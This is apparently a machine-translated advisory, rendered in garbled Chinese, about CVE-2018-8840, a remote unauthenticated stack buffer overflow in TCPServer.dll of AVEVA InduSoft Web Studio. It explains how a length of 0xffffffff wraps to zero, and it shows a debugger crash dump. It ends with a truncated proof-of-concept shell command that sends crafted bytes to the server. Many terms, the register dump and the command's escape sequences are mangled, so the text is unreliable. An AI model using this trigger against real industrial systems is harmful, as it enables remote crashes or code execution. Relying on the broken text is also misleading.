AVEVAInduSoft网页工作室和触控机器远程代码执行

可耐性发现栈缓冲溢出易损TCPServer.dll开发时esus插件ForCVE-2018-8840.理解漏洞描述WSTR系统结构内TCPServer.dll实用性 。上头WSTR系统类存储广字符串:

类WSTR{可变性无签名短lbufs/本地存储字符串数据无效//ptr字符串数据可指向@lbuf int32DataLen/分配长度@pData};

短于0x40字节存储布夫数组数组否则堆内存分配PData数据库并数据链并相应更新

处理命令81时TCPServer.dll尝试读入字符串WSTR系统对象.判定字符串应否存储lbuf系统或堆积分配缓冲TCPServer.dll首读字符串长度用户提供长度加法一计算无效终止者并比对0x40if长度+1小于0x40后字符串存储lbuf系统.远程非认证攻击者提供0xffffff添加时长度滚转为零TCPServer.dll尝试存储字符串lbuf系统.服务器随后将尝试拷贝0xffffffflbuf系统产生堆栈缓冲溢出

STATUS_STACK_BUFFER_OVERRUN encountered (9e8.b28): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=5d15b708 ecx=766ce4b4 edx=0e76efb9 esi=00000000 edi=00ec2870 eip=766ce331 esp=0e76f200 ebp=0e76f27c iopl=0         nv up ei pl zr na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246 kernel32!UnhandledExceptionFilter+0x5f: 766ce331 cc              int     3 0:020> kb  # ChildEBP RetAddr  Args to Child               00 0e76f27c 694c00f1 5d15b708 0e76f298 5d133403 kernel32!UnhandledExceptionFilter+0x5f *** ERROR: Symbol file could not be found.默认导出符号c:\ programfile\InduSoftWeb Studiov8.1\Bin\TCPER.DLL-010E76f2885d1334035d15b708000010e76f5c8MSVCR110后台框架可能出错 。076f18TCPSERVER!_StudeSetLanguage+076f7

下命令重创问题 :

猫 < (echo-ne 'x02\x31x10x38x10x32\x32x03\x02x51xff\xffxff\xffxffxffxffxffxffxff
              
               1234